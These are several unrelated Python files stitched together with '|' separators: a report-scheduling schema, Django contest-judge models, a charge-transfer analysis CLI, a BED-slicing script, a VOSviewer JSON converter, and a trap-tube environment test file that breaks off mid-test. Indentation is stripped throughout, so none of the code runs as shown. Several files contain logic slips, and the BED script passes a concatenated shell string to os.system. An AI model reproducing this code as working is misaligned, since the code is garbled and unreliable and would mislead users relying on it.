DEFAULT_MONTH_DAY = 1
SCHEDULE_CHOICES = [DAILY, WEEKLY, MONTHLY]
class ScheduleConfiguration(DocumentSchema):
interval = StringProperty(choices=SCHEDULE_CHOICES)
hour = IntegerProperty(default=DEFAULT_HOUR)
day_of_week = IntegerProperty(default=DEFAULT_WEEK_DAY) # same as cron, 1 = Monday (0 and 7 = Sunday)
day_of_month = IntegerProperty(default=DEFAULT_MONTH_DAY)
class TemplateVariable(DocumentSchema):
slug = StringProperty(required=True, default='forms')
type = StringProperty(required=True, choices=['form']) # todo: can extend to cases
time_range = StringProperty(choices=[choice.slug for choice in get_simple_dateranges()])
# Either the case type or the form xmlns that this template variable is based on.
source_id = StringProperty()
# The app that the form belongs to - not currently used, but could be used in the future to prevent
# duplicate XMLNSes in the same project
app_id = StringProperty()
class PerformanceConfiguration(Document):
domain = StringProperty(required=True)
recipient_id = StringProperty(required=True) # an ID of a Group
schedule = SchemaProperty(ScheduleConfiguration)
template_variables = SchemaListProperty(TemplateVariable)
template = StringProperty(required=True)
@property
@memoized
def group(self):
group = Group.get(self.recipient_id)
assert group.domain == self.domain
return group
|
from django.contrib.auth.models import User
from django.core.validators import MinValueValidator
from django.db import models
from django.db.models import Sum
from contest.models import Contest
class Language(models.Model):
id = models.AutoField(primary_key=True)
name = models.CharField(max_length=20)
judge0_lang_id = models.CharField(max_length=3)
monaco_lang_code = models.CharField(max_length=20, default='cpp')
stack_limit = models.IntegerField(default=2048)
cpu_time_limit = models.IntegerField(default=2)
# mem_limit should be >= 2048 as expected by judge0
mem_limit = models.IntegerField(validators=[MinValueValidator(2048)],
default=2048)
filesize_limit = models.IntegerField(default=1024)
process_limit = models.IntegerField(default=50)
wall_time_limit = models.IntegerField(default=3)
def __str__(self):
return "{} - ID{}".format(self.name, self.id)
class UserContest(models.Model):
STATUSES = [
('REGISTERED', 'REGISTERED'),
('STARTED', 'STARTED'),
('ENDED', 'ENDED')
]
contest_id = models.ForeignKey(Contest, on_delete=models.CASCADE,
related_name='user_contests')
user_id = models.ForeignKey(User, on_delete=models.CASCADE)
status = models.CharField(max_length=20, choices=STATUSES,
default='REGISTERED')
@property
def total_score(self):
user_ques = UserQuestion.objects.filter(user_contest=self)
total_sum = user_ques.aggregate(Sum('score'))
return total_sum['score__sum'] or 0.0
@property
def total_penalty(self):
user_ques = UserQuestion.objects.filter(user_contest=self)
total_sum = user_ques.aggregate(Sum('penalty'))
return total_sum['penalty__sum'] or 0.0
class Meta:
indexes = [
models.Index(fields=['contest_id', 'user_id', ]),
]
def __str__(self):
return "{}-{}".format(self.contest_id.name, self.user_id.username)
class UserQuestion(models.Model):
que = models.ForeignKey(to='question.Question', on_delete=models.CASCADE,
null=True)
user_contest = models.ForeignKey(UserContest, on_delete=models.CASCADE,
related_name='questions')
penalty = models.FloatField(default=0)
score = models.FloatField(default=0)
class Meta:
unique_together = ['user_contest', 'que']
|
import argparse
import os
from . import transition_analysis_utils as tau
from . import vtk_output_utils as vtk_out
def main():
parser = argparse.ArgumentParser()
parser.add_argument("input_dir",
type=str,
help="The directory containing the input cube files for transitions. "
"The directory should a 'metadata.csv' file which contains 3 columns. "
"The first specifies the name of the transition. The second and third "
"columns specify hole and particle cube files respectively.")
parser.add_argument("-p", "--different_atom_pos",
default=False,
action='store_true',
help="If specified, Voronoi diagram will be computed for each cube "
"file separately. By default it is assumed, the atomic positions remain "
"the same for all the cube files.")
parser.add_argument("-q", "--use_quadratic_optimization",
default=False,
action='store_true',
help="Use quadratic programming based optimization approach to compute "
"the charge trasfer between subgroups. By default a hueristic approach "
"is used for this purpose.")
parser.add_argument("-d", "--output_transition_diagram",
default=False,
action='store_true',
help="If specified, transition diagram will be generated for all the "
"transitions in '<input_dir>/results/transition_diagrams/' directory.")
parser.add_argument("-a", "--output_atomic_charges",
default=False,
action='store_true',
help="If specified, atomic charges for each transition will be output"
" as a csv file in the directory '<input_dir>/results/atomic_charges/'.")
parser.add_argument("-s", "--output_subgroup_charges",
default=False,
action='store_true',
help="If this option is set, subgroup charges and amount of charge "
"transfer for each transition would be output in a directory named "
"'<input_dir>/results/subgroup_charges/'.")
parser.add_argument("-av", "--output_atoms_vtk",
default=False,
action='store_true',
help="If this option is set, the atoms are saved as 3D model in VTK format. "
"A file is generated for each transition which contains the data about "
"the hole and particle charge, charge difference, subgroup, etc. "
"These VTK files are saved in '<input_dir>/results/vtk/atoms/' and "
"can be loaded in VTK compatible software like Paraview.")
parser.add_argument("-sv", "--output_segmentation_vtk",
default=False,
action='store_true',
help="If specified, the computed Voronoi segmentation at atomic and "
"subgroup scales are saved as VTK compatible files in the directory "
"'<input_dir>/results/vtk/segmentation/'. These files can be loaded in "
"VTK compatible software like Paraview.")
parser.add_argument("-t", "--threads",
type=int,
default=4,
help="Specify the number of parallel threads to be used in "
"computing the Voronoi diagram. By default four threads are used.")
args = parser.parse_args()
input_dir = args.input_dir
different_atom_pos = args.different_atom_pos
use_quadratic_optimization = args.use_quadratic_optimization
threads = args.threads
output_transition_diagram = args.output_transition_diagram
output_atomic_charges = args.output_atomic_charges
output_subgroup_charges = args.output_subgroup_charges
output_atoms_vtk = args.output_atoms_vtk
output_segmentation_vtk = args.output_segmentation_vtk
if not os.path.isdir(input_dir):
print("Can't find the specified input directory. Exiting ...")
exit(0)
metadata_file = input_dir + "metadata.csv"
if not os.path.isfile(metadata_file):
print("Can't find metadata.csv file in the directory. Exiting ...")
exit(0)
state_files = tau.read_metadata_file(metadata_file)
if not state_files:
print("No cube files specified in the metadata.csv file. Exiting ...")
exit(0)
output_dir = input_dir + "results/"
if not os.path.isdir(output_dir):
print("Creating the output directory: %s" % output_dir)
os.makedirs(os.path.dirname(output_dir))
if output_atomic_charges:
output_dir = input_dir + "results/atomic_charges/"
if not os.path.isdir(output_dir):
print("Creating the output directory for atomic charges: %s" %
output_dir)
os.makedirs(os.path.dirname(output_dir))
if output_subgroup_charges:
output_dir = input_dir + "results/subgroup_charges/"
if not os.path.isdir(output_dir):
print("Creating the output directory for subgroup charges: %s" %
output_dir)
os.makedirs(os.path.dirname(output_dir))
if output_transition_diagram:
output_dir = input_dir + "results/transition_diagrams/"
if not os.path.isdir(output_dir):
print("Creating the output directory for transition diagrams: %s" %
output_dir)
os.makedirs(os.path.dirname(output_dir))
if output_atoms_vtk:
output_dir = input_dir + "results/vtk/atoms/"
if not os.path.isdir(output_dir):
print("Creating the output directory for atomic charges: %s" %
output_dir)
os.makedirs(os.path.dirname(output_dir))
transitions = []
transition_names = []
for state_file in state_files:
hole_cubeFile = input_dir + state_file[1]
particle_cubeFile = input_dir + state_file[2]
transition = tau.load_transition(hole_cubeFile, particle_cubeFile)
transitions.append(transition)
transition_names.append(state_file[0])
print("Loaded the hole and particle cube files ...")
segment_arrays = tau.compute_atomic_charges(
transitions, num_threads=threads, same_atomic_positions=not different_atom_pos,
save_segmention=output_segmentation_vtk)
print("Compted the Voronoi diagram based segmentation and atomic charges ...")
subgroup_file = input_dir + "subgroups.txt"
if os.path.isfile(metadata_file):
subgroup_names, atom_subgroup_map = tau.load_subgroups(
subgroup_file)
else:
if output_subgroup_charges or output_transition_diagram:
print("Can't find subgroups.txt file in the input directory. "
"The subgroup charges and transition diagrams will not be computed.")
output_subgroup_charges = output_transition_diagram = False
subgroup_names = []
atom_subgroup_map = [0] * transitions[0].num_atoms()
for i in range(len(transitions)):
transition = transitions[i]
if output_atomic_charges:
output_file = input_dir + "results/atomic_charges/" + \
"%s.csv" % transition_names[i]
tau.save_atomic_charges(
output_file, transition.hole_data.atoms, transition.hole_charges,
transition.particle_charges, subgroup_names, atom_subgroup_map)
if output_atoms_vtk:
output_file = input_dir + "results/vtk/atoms/" + \
"%s.vtp" % transition_names[i]
vtk_out.write_atoms(output_file, transition.hole_data.atoms,
transition.hole_charges, transition.particle_charges, atom_subgroup_map)
if output_subgroup_charges or output_transition_diagram:
subgroup_info = tau.SubgroupInfo()
subgroup_info.set_subgroups(subgroup_names, atom_subgroup_map)
tau.compute_subgroup_charges(transition, subgroup_info, use_hueristic=not use_quadratic_optimization)
if output_subgroup_charges:
output_file = input_dir + "results/subgroup_charges/" + \
"%s.txt" % transition_names[i]
subgroup_info.save_to_file(output_file)
if output_transition_diagram:
output_file = input_dir + "results/transition_diagrams/" + \
"%s.png" % transition_names[i]
tau.create_diagram(
subgroup_info, title=transition_names[i], show_plot=False, save_plot=True, file_name=output_file)
if output_segmentation_vtk:
output_dir = input_dir + "results/vtk/segmentation/"
if not os.path.isdir(output_dir):
os.makedirs(os.path.dirname(output_dir))
if different_atom_pos:
for i in range(len(transitions)):
data = transitions[i].hole_data
vtk_out.write_segments(output_dir + "%s_hole_seg_atoms.vtp" %
transition_names[i], segment_arrays[2 * i], data.basis, data.atoms)
if output_subgroup_charges or output_transition_diagram:
vtk_out.write_subgroup_segments(
output_dir +
"%s_hole_seg_subgroups.vtp" % transition_names[i],
segment_arrays[2 * i], data.basis, data.atoms, len(subgroup_names), atom_subgroup_map)
data = transitions[i].particle_data
vtk_out.write_segments(output_dir + "%s_particle_seg_atoms.vtp" %
transition_names[i], segment_arrays[2 * i + 1], data.basis, data.atoms)
if output_subgroup_charges or output_transition_diagram:
vtk_out.write_subgroup_segments(
output_dir +
"%s_particle_seg_subgroups.vtp" % transition_names[i],
segment_arrays[2 * i + 1], data.basis, data.atoms, len(subgroup_names), atom_subgroup_map)
else:
data = transitions[0].hole_data
vtk_out.write_segments(
output_dir + "seg_atoms.vtp", segment_arrays[0], data.basis, data.atoms)
if output_subgroup_charges or output_transition_diagram:
vtk_out.write_subgroup_segments(
output_dir + "seg_subgroups.vtp", segment_arrays[0], data.basis, data.atoms, len(subgroup_names), atom_subgroup_map)
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
import os
import bed
import sys
import argparse
parser = argparse.ArgumentParser(description='slice bed based on the score order')
parser.add_argument('-i', required= True, help='<Required> input')
parser.add_argument('-n', required= False, default=4, type=int, help='total n pieces (default: 4)')
parser.add_argument('-slice', required= True, type=int, help='slice number from big to small')
args = parser.parse_args()
bedFile = args.i
totalPieces = args.n
sliceNum = args.slice
totalHitNumber = bed.bed(bedFile).getHitNum()
code = 'sort -r -k5,5n ' + bedFile + ' | awk "NR>=' + str((sliceNum-1)*float(totalHitNumber/totalPieces)) +' && NR<' + str(sliceNum*float(totalHitNumber/totalPieces)) + '" | sort -k1,1 -k2,2n -k3,3n'
# print(code)
os.system(code) |
#!/usr/bin/env python
# coding: utf-8
import pandas as pd
import json
import re
import random
import argparse
import os
def main() -> None:
"""Entrypoint of Program Run as Module"""
...
def read_args():
parser = argparse.ArgumentParser()
parser.add_argument( "node_col_name_1", type=str, help="column name of input file to be represented as node (first of two inputs)")
parser.add_argument( "edge_col_name", type=str, help="column name of input file to be represented as edges (first of one input)")
parser.add_argument( "node_col_name_2", type=str, help="column name of input file to be represented as node (second of two inputs)")
parser.add_argument("-i", "--input_filename", type=str, help=".csv input filepath to translate into VOSviewer triplets")
parser.add_argument("-c", "--context_col_name", type=str, default="texts", help="column file to be represented as context")
parser.add_argument("-v", "--verbosity", action="count", default=0)
parser.add_argument("-o", "--output", type=str, default=os.path.join(dir, 'output', 'output.json'), help="argument for specifying output filepath location")
parser.add_argument("-f", "--include_formatted_html", action="count", default=0, help="argument to determine if metadata should be included & description formatted specific to Discrimination Triplets")
args = parser.parse_args()
if args.input_filename == None:
default_path = os.path.join(dir, 'data', 'antisemitism_discrimination_triplets.csv')
print("No explicitly specified input filepath. Using default input filepath: " + default_path)
args.input_filename = default_path
if os.path.exists(args.input_filename) == False: # specified or default filepath does not exist
print("Filepath not found.")
potential_files = os.listdir(os.path.join(dir, 'data'))
csv_files = list(filter(lambda f: f.endswith('.csv'), potential_files))
print("Searching through data directory for valid input file...")
if len(csv_files) >= 0:
found_file = False
for input_filepath in csv_files:
new_path = os.path.join(dir, 'data', input_filepath)
print("Run Program on this filepath: " + new_path + " ? (y/n)")
user_input = input()
if user_input[0] == 'Y' or user_input[0] == 'y':
args.input_filename = new_path
found_file = True
break
else:
continue
if found_file == False:
print("No more valid input files. Exiting Program")
exit()
else:
print("Exiting Program")
exit()
return {
"file_path" : args.input_filename,
"node_column_names" : [args.node_col_name_1, args.node_col_name_2],
"edge_column_name" : args.edge_col_name,
"context_column_name" : args.context_col_name,
"output_path" : args.output,
"verbosity": args.verbosity,
"include_formatted_html" : args.include_formatted_html
}
def extract_int_code(file_name):
int_code = file_name.split('-')[0][:-1]
return int_code
def make_html(drive_id):
return 'https://drive.google.com/uc?export=view&id=' + str(drive_id)
def clean_text (input_text):
try:
input_text = input_text.lower() # lowercase the text
input_text = input_text.strip() # remove any excess spaces around text
input_text = input_text.capitalize() # capitalize first letter
return input_text
except AttributeError:
return input_text
def configure_metadata(df_input):
try:
filename = os.path.join(dir, 'description_metadata', 'drive_ids.csv')
drive_ids = pd.read_csv(filename) # need to make this flexible to provide custom drive ids
except:
print("Error reading google drive id file. Exiting Program")
drive_ids['int_code'] = [extract_int_code(x) for x in drive_ids['file_name']]
drive_ids['drive_id'] = drive_ids['drive_id'].astype('str')
drive_ids['int_code'] = drive_ids['int_code'].astype('int64')
drive_ids.drop_duplicates(subset='int_code')
drive_ids_ = []
for row in df_input.itertuples():
if row.intcode in drive_ids['int_code'].to_list():
drive_ids_.append(drive_ids[drive_ids['int_code'] == row.intcode]['drive_id'].values[0])
else:
drive_ids_.append('nan')
df_input['drive_id'] = drive_ids_
df_input['image_link'] = [make_html(x) for x in df_input['drive_id']]
df_input[df_input['image_link'] == 'https://drive.google.com/file/d/nan/view']['image_link'] = "https://via.placeholder.com/100.png?text=Speaker+Picture"
corrected_link = []
for value in df_input['image_link']:
if value == 'https://drive.google.com/uc?export=view&id=nan':
corrected_link.append('https://via.placeholder.com/100.png?text=Speaker+Picture')
else:
corrected_link.append(value)
df_input['image_link'] = corrected_link
corrected_URL = []
testimony_id = []
for row in df_input.itertuples():
if pd.isna(row.segment) == False:
testimony_id.append(row.URL.split('&')[0].split('=')[1])
url = row.URL.split('&')[0]
url = url + '&segmentNumber=' + str(row.segment)
corrected_URL.append(url)
else:
corrected_URL.append(row.URL.split('&')[0])
df_input['URL'] = corrected_URL
df_input['testimony_id'] = testimony_id
df_input['image_link'].to_list()
return df_input
def format_dataframe(df, path):
df['subjects_coref'] = [clean_text(x) for x in df['subjects_coref']]
df['objects_coref'] = [clean_text(x) for x in df['objects_coref']]
# get all of the entities from the corpus
all_entities = df['subjects_coref'].append(df['objects_coref'])
# eliminate duplicate entry
all_entities = all_entities.drop_duplicates()
# reset index, use index of unique entities as id
all_entities = all_entities.reset_index(drop=True)
all_entities.index = range(1,len(all_entities)+1)
# first generate the nodes by finding unique entities in the spreadsheet...
entity_list_to_convert = []
filename = os.path.join(dir, 'description_metadata', 'contraction.csv')
contractions = pd.read_csv(filename)
contractions = dict(zip(contractions.extended, contractions.contraction))
filename = os.path.join(dir, 'description_metadata', 'manual_relation_corrections.csv')
manual_corrections = pd.read_csv(filename)
manual_corrections = dict(zip(manual_corrections.full_text, manual_corrections.manual_corrections))
def make_heading_html(text):
return "<div class='description_heading'>" + text + "</div>"
def make_formatted_text_html(text, relation):
relation = relation.strip()
context = text.split(relation)
if len(context) == 1:
# search for a contraction
for extended in contractions.keys():
if extended in relation:
relation = contractions[extended] # replace extended phrase with contraction of extended
context = text.split(relation)
break
if len(context) == 1:
# search for manual corrections...
for full_text in manual_corrections.keys():
if full_text == text or full_text in text:
relation = manual_corrections[full_text]
context = text.split(relation)
try:
return '<div class="basic_text" >' + context[0] + "<b>" + relation + "</b>" + context[1] + "</div>"
except TypeError:
return ""
except IndexError:
return '<div class="basic_text" >' + text + "</div>"
def make_label_html(text):
return "<div class='description_label'>" + text + "</div>"
def make_link_html(text, link):
return "<a class='description_url' href='" + link + "'>{" + text + "}</a>"
def make_specialized_triplet(df):
output = ''
for row in df.itertuples():
output = output + ("<div class='description_heading'><a class='description_url' href='" + row.URL + "'> " + row.full_name + " </a></div>" + '<img src=' + row.image_link + ' width="200px" height="auto">'
+ make_heading_html('Context: ') + make_formatted_text_html(row.texts, row.relations) + "<hr>")
output = output[:-4]
return output
def make_generic_triplet(df):
for row in df.itertuples():
output = ''
output = output + ('<div class="basic_text" >' + "<b>" + str(args_dict["node_column_names"][0]) + ": " + "</b>" + row.subjects_coref + "</div>" +
'<div class="basic_text" >' + "<b>" + str(args_dict["edge_column_name"]) + ": " + "</b>" + row.relations + "</div>" +
'<div class="basic_text" >' + "<b>" + str(args_dict["node_column_names"][1]) + ": " + "</b>" + row.objects_coref + "</div>")
try:
output = output + '<div class="basic_text" >' + "<b>" + str(args_dict['context_column_name']) + ": " + "</b>" + str(row.texts) + "</div>"
except:
pass
output = output + "<hr>"
output = output[:-4]
return output
# make descriptions for each entity
for entity in all_entities:
if (pd.isna(entity) == True):
continue
sample_triplets = df[(df['subjects_coref'] == entity) | (df['objects_coref'] == entity)]
sample_triplets = sample_triplets.sample(frac=1, random_state=0)
sample_triplets = sample_triplets.head(3) # only sample the top 3 entities
entity_to_convert = {
"id": int(all_entities[all_entities == entity].index[0]),
"label": str(entity),
"weights": {
"Documents": 1, #len(df[df['subjects_coref'] == entity]), number of times entity appeared in subset relations (could incorporate global metrics)
"Citations": 1 #len(df[df['subjects_coref'] == entity]) same as above, but number of relations
}
}
if args_dict['include_formatted_html'] >= 1:
entity_to_convert["description"] = '<div class="content-box">' + "<div class='description_heading'> Sample Triplets: {label} </div>" + make_specialized_triplet(sample_triplets) + '</div>',
else:
entity_to_convert["description"] = '<div class="content-box">' + "<div class='description_heading'> Sample Triplets: {label} </div>" + make_generic_triplet(sample_triplets) + '</div>',
entity_list_to_convert.append(entity_to_convert)
items = entity_list_to_convert
# generate descriptions for each link; should look into implementing protocol for looking at duplicate instances
df_dedupe = df.drop_duplicates(subset=['subjects_coref', 'relations', 'objects_coref'])
links = []
for row in df_dedupe.itertuples():
if (pd.isna(row.subjects_coref) == True or pd.isna(row.objects_coref) == True):
continue
try:
link_python = {
"source_id" : int(all_entities[all_entities == row.subjects_coref].index[0]),
"target_id" : int(all_entities[all_entities == row.objects_coref].index[0]),
"strength" : 1 #len(df[(df['subjects_coref'] == row.subjects_coref) & (df['objects_coref'] == row.objects)]),
}
if args_dict['include_formatted_html'] >= 1: # bespoke formatting
link_python["description"] = ('<div class="content-box">' + "<div class='description_heading'><a class='description_url' href='" + row.URL + "'> " + row.full_name + " </a></div>" + '<img src=' + row.image_link + ' width="200px" height="auto">'
+ make_heading_html('Context: ') + make_formatted_text_html(row.texts, row.relations) + '</div>')
else: # generic formatting
output = ('<div class=basic_text >' + "<b>" + str(args_dict["node_column_names"][0]) + ": " + "</b>" + row.subjects_coref + "</div>" +
'<div class="basic_text" >' + "<b>" + str(args_dict["edge_column_name"]) + ": " + "</b>" + row.relations + "</div>" +
'<div class="basic_text" >' + "<b>" + str(args_dict["node_column_names"][1]) + ": " + "</b>" + row.objects_coref + "</div>")
try: # attempt generic formatting with context
output = output + '<div class="basic_text" >' + "<b>" + str(args_dict['context_column_name']) + ": " + "</b>" + str(row.texts) + "</div>"
except AttributeError: # no context found, omit context
pass
link_python["description"] = output
except TypeError:
continue
links.append(link_python)
def make_plural(input_str): # slightly naive way to handle plurals
if input_str[-1] == 's' or input_str[-1] == 'S':
return input_str + 's'
else :
return input_str
data_struct = {'network': {'items': items, 'links': links},
'config': {'terminology': {'item' : args_dict["node_column_names"][0] + '/' + args_dict["node_column_names"][1], 'items' : make_plural(args_dict["node_column_names"][0]) + '/' + make_plural(args_dict["node_column_names"][1]),
'link' : args_dict["edge_column_name"], 'links' : make_plural(args_dict["edge_column_name"])},
'parameters' : {'item size' : 1},
'styles' : {'description_heading' : "label: description-heading;\n color: #757575;\n font-weight: 600;\n font-size: 1.5em;\n ",
'description_label' : "label: description-label;\n ",
'description_text ': "label: description-text;\n margin-bottom: 4px;\n font-size: 1.25em;\n", # not in use, have been using basic text styling below instead
'basic_text' : "label: basic-text; margin-bottom: 4px;\n font-size: 1.25em;\n",
'description_url' : '\n label: description-url;\n text-decoration: none;\n color: #1e7896;\n font-weight: 600;\n font-size: 1.25em;\n '},}
}
output = json.JSONEncoder().encode(data_struct)
with open(path, 'w') as json_file:
json.dump(data_struct, json_file)
if __name__ == "__main__":
dir = os.path.dirname(__file__)
args_dict = read_args()
try:
df_input = pd.read_csv(args_dict['file_path'])
except Exception as e:
print(e)
print("Error reading provided input file. Exiting Program")
exit()
# easy fix currently, but not very efficient
df_input['objects_coref'] = df_input[args_dict["node_column_names"][0]]
df_input['subjects_coref'] = df_input[args_dict["node_column_names"][1]]
df_input['relations'] = df_input[args_dict["edge_column_name"]]
try:
df_input['texts'] = df_input[args_dict["context_column_name"]]
except KeyError:
print("Context metadata for triplets not found. Use Argument -c to specify context column within input data (if applicable)")
if args_dict["include_formatted_html"] >= 1:
if args_dict['verbosity'] >= 1:
print('Fetching Metadata for triplets specific to Discrimination Dataset...')
try:
df_input = configure_metadata(df_input)
except Exception as e:
print(e)
print("Error fetching metadata for triplets specific to Discrimination Dataset \nBe sure that the input Datatset is formatted in a similar way to Discrimination Dataset, or do not use the -f argument")
exit()
if args_dict['verbosity'] >= 1:
if args_dict["include_formatted_html"] >= 1:
print("Formatting HTML descriptions specific to Discrimination Dataset...")
else:
print("Formatting HTML descriptions for general data")
try:
format_dataframe(df_input, args_dict['output_path'])
except Exception as e:
print(e)
print("Error translating Dataset to VOSviewer JSON file")
exit()
if args_dict['verbosity'] >= 1:
out = os.path.basename(args_dict["output_path"])
print("Finished Task.")
|
"""Tests for trap tube environments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import unittest
from absl.testing import absltest
from absl.testing import parameterized
from gym_tool_use import trap_tube_env
uu = trap_tube_env.ACTIONS.up.up
ud = trap_tube_env.ACTIONS.up.down
ul = trap_tube_env.ACTIONS.up.left
ur = trap_tube_env.ACTIONS.up.right
du = trap_tube_env.ACTIONS.down.up
dd = trap_tube_env.ACTIONS.down.down
dl = trap_tube_env.ACTIONS.down.left
dr = trap_tube_env.ACTIONS.down.right
lu = trap_tube_env.ACTIONS.left.up
ld = trap_tube_env.ACTIONS.left.down
ll = trap_tube_env.ACTIONS.left.left
lr = trap_tube_env.ACTIONS.left.right
ru = trap_tube_env.ACTIONS.right.up
rd = trap_tube_env.ACTIONS.right.down
rl = trap_tube_env.ACTIONS.right.left
rr = trap_tube_env.ACTIONS.right.right
class TestEnv(trap_tube_env.BaseTrapTubeEnv):
def __init__(self,
art,
tool_position,
tool_size,
tool_direction,
food_position):
self._art = art
self._tool_position = tool_position
self._tool_size = tool_size
self._tool_direction = tool_direction
self._food_position = food_position
super(TestEnv, self).__init__(
max_iterations=100,
delay=240)
def _make_trap_tube_config(self):
return trap_tube_env.TrapTubeConfig(
art=self._art,
tool_position=self._tool_position,
tool_size=self._tool_size,
tool_direction=self._tool_direction,
food_position=self._food_position,
tool_category=trap_tube_env.TOOL)
def make_colors(self):
return trap_tube_env.base_colors
class TrapTubeEnvTest(parameterized.TestCase):
def setUp(self):
super(TrapTubeEnvTest, self).setUp()
self._render = False
def _compare_transition(self, env, action, render=False):
initial_state = env.reset()
if render:
env.render()
next_state, _, _, _ = env.step(action)
if render:
env.render()
env.close()
return np.all(np.equal(next_state, initial_state))
def assertNoTransition(self, env, action, render=False):
self.assertTrue(
self._compare_transition(env, action, render=render))
def assertTransition(self, env, action, render=False):
self.assertFalse(
self._compare_transition(env, action, render=render))
def testActionsWithToolNoImpassables(self):
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' a ',
' ',
' ',
' ',
],
tool_position=(3 + 1, 1),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, uu, render=self._render)
self.assertTransition(env, ud, render=self._render)
self.assertTransition(env, ul, render=self._render)
self.assertTransition(env, ur, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' a ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(3 + 1, 1),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, du, render=self._render)
self.assertTransition(env, dd, render=self._render)
self.assertTransition(env, dl, render=self._render)
self.assertTransition(env, dr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' a u n ',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(3 + 1, 2),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, ru, render=self._render)
self.assertTransition(env, rd, render=self._render)
self.assertTransition(env, rl, render=self._render)
self.assertTransition(env, rr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' a u n ',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(3 + 1, 1),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, lu, render=self._render)
self.assertTransition(env, ld, render=self._render)
self.assertTransition(env, ll, render=self._render)
self.assertTransition(env, lr, render=self._render)
def testActionsWithToolTransitionIntoTube(self):
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' a ',
' ',
' ',
' ',
],
tool_position=(4, 3),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, uu, render=self._render)
self.assertTransition(env, ud, render=self._render)
self.assertTransition(env, ul, render=self._render)
self.assertTransition(env, ur, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' a ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(4, 3),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, du, render=self._render)
self.assertTransition(env, dd, render=self._render)
self.assertTransition(env, dl, render=self._render)
self.assertTransition(env, dr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' ',
' a ',
' ',
' ',
],
tool_position=(6, 3),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, lu, render=self._render)
self.assertTransition(env, ld, render=self._render)
self.assertTransition(env, ll, render=self._render)
self.assertTransition(env, lr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwww ',
' a ',
' ',
' ',
' ',
],
tool_position=(5, 4),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, ru, render=self._render)
self.assertTransition(env, rd, render=self._render)
self.assertTransition(env, rl, render=self._render)
self.assertTransition(env, rr, render=self._render)
def testActionsWithToolImpassableTubeRight(self):
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' awwww ',
' ',
' ',
' ',
' ',
],
tool_position=(3, 3),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, uu, render=self._render)
self.assertTransition(env, ud, render=self._render)
self.assertTransition(env, ul, render=self._render)
self.assertNoTransition(env, ur, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' au n ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(7, 3),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, du, render=self._render)
self.assertTransition(env, dd, render=self._render)
self.assertTransition(env, dl, render=self._render)
self.assertNoTransition(env, dr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' awwww ',
' ',
' ',
' ',
' ',
],
tool_position=(4, 2),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, lu, render=self._render)
self.assertTransition(env, ld, render=self._render)
self.assertTransition(env, ll, render=self._render)
self.assertNoTransition(env, lr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' awwww ',
' ',
' ',
' ',
' ',
],
tool_position=(4, 4),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, ru, render=self._render)
self.assertTransition(env, rd, render=self._render)
self.assertTransition(env, rl, render=self._render)
self.assertNoTransition(env, rr, render=self._render)
def testActionsWithToolImpassableTubeLeft(self):
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwwwa ',
' ',
' ',
' ',
' ',
],
tool_position=(3, 8),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, uu, render=self._render)
self.assertTransition(env, ud, render=self._render)
self.assertNoTransition(env, ul, render=self._render)
self.assertTransition(env, ur, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u na ',
' wwww ',
' ',
' ',
' ',
' ',
],
tool_position=(7, 8),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, du, render=self._render)
self.assertTransition(env, dd, render=self._render)
self.assertNoTransition(env, dl, render=self._render)
self.assertTransition(env, dr, render=self._render)
env = TestEnv(
art=[
' ',
' ',
' ',
' ',
' mmmm ',
' u n ',
' u n ',
' wwwwa ',
' ',
' ',
' ',
' ',
],
tool_position=(4, 7),
tool_size=4,
tool_direction=0,
food_position=(4 + 1, 4 + 1))
self.assertTransition(env, lu, render=self._render)
self.assertTransition(env, ld, render=self._render)
